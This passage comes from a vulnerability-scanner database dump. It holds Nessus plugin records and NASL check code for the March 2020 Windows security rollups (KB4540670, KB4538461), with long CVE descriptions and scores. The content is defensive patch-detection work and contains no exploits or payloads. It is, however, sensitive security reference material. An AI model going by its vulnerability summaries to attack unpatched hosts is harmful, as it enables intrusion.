or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540670');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4540670])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:29:18", "description": "The remote Windows host is missing security update 4538461.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. 
The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-0854)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. 
An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the way the Provisioning Runtime validates certain file operations. An attacker who successfully exploited the vulnerability could gain elevated privileges on a victim system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. 
A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. 
An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows Defender Security Center handles certain objects in memory. 
(CVE-2020-0763)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0879)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles file operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-0775)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. 
An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0811, CVE-2020-0812)\n\n - An information disclosure vulnerability exists when Chakra improperly discloses the contents of its memory, which could provide an attacker with information to further compromise the user\u2019s computer or data. (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-08323, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831, CVE-2020-0848)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4538461: Windows 10 Version 1809 and Windows Server 2019 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0763", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0776", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0798", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0807", "CVE-2020-0808", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0811", "CVE-2020-0812", "CVE-2020-0813", "CVE-2020-0814", "CVE-2020-0816", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", 
"CVE-2020-0825", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-08323", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0854", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4538461.NASL", "href": "https://www.tenable.com/plugins/nessus/134368", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134368);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0763\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0776\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0798\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0807\",\n \"CVE-2020-0808\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0811\",\n \"CVE-2020-0812\",\n \"CVE-2020-0813\",\n \"CVE-2020-0814\",\n \"CVE-2020-0816\",\n \"CVE-2020-0819\",\n \"CVE-2020-0820\",\n \"CVE-2020-0822\",\n \"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0825\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n \"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0848\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0854\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n 
\"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0896\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4538461\");\n script_xref(name:\"MSFT\", value:\"MS20-4538461\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4538461: Windows 10 Version 1809 and Windows Server 2019 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4538461.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. 
(CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-0854)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. 
(CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the\n way the Provisioning Runtime validates certain file\n operations. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a victim\n system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. 
(CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector allows file creation in arbitrary\n locations. (CVE-2020-0810)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. 
An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849,\n CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a user's system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the user's system. An attacker who had already\n gained execution on the victim system could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how Media Foundation handles objects in\n memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-0867,\n CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. 
(CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows Defender Security Center handles certain objects\n in memory. (CVE-2020-0763)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0879)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. 
